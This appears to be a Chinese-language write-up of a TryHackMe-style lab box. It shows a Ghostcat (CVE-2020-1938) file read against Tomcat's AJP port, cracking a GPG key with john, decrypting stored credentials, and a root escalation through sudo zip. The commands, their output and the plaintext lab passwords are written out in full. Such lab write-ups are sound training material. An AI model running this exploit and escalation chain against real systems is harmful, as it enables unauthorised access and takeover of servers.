Pasted%20image%2020240127203037
扫到tomcat,看名字也应该是
稍微百度一下就知道这个漏洞了
poc地址

CVE-2020–1938

p4 python3 ajpShooter.py http://10.10.90.130:8080 8009 /WEB-INF/web.xml read
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/aarch64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16

       _    _         __ _                 _            
      /_\  (_)_ __   / _\ |__   ___   ___ | |_ ___ _ __ 
     //_\\ | | '_ \  \ \| '_ \ / _ \ / _ \| __/ _ \ '__|
    /  _  \| | |_) | _\ \ | | | (_) | (_) | ||  __/ |   
    \_/ \_// | .__/  \__/_| |_|\___/ \___/ \__\___|_|   
         |__/|_|                                        
                                                00theway,just for test
    
[proxychains] Strict chain  ...  120.46.78.45:7777  ...  10.10.90.130:8009  ...  OK

[<] 200 200
[<] Accept-Ranges: bytes
[<] ETag: W/"1261-1583902632000"
[<] Last-Modified: Wed, 11 Mar 2020 04:57:12 GMT
[<] Content-Type: application/xml
[<] Content-Length: 1261

<?xml version="1.0" encoding="UTF-8"?>
<!--
 Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
                      http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
  version="4.0"
  metadata-complete="true">

  <display-name>Welcome to Tomcat</display-name>
  <description>
     Welcome to GhostCat
        skyfuck:8730281lkjlkjdqlksalks
  </description>

</web-app>

skyfuck:8730281lkjlkjdqlksalks
然后ssh上去
Pasted%20image%2020240127205145

发现有密钥和加密的东西,wget下来

gpg2john tryhackme.asc > hash.txt
Pasted%20image%2020240127205259

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
一秒解出来
Pasted%20image%2020240127205354

然后在被害机里
gpg --import tryhackme.asc//导入公钥文件
Pasted%20image%2020240127205518

gpg -d credential.pgp//解密credential.pgp
Pasted%20image%2020240127205606
输入破解出来的密码得到
merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j
ssh上去

简单搜集一下信息
sudo -l发现zip,简单搜索一下拿到root权限,结束了

TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF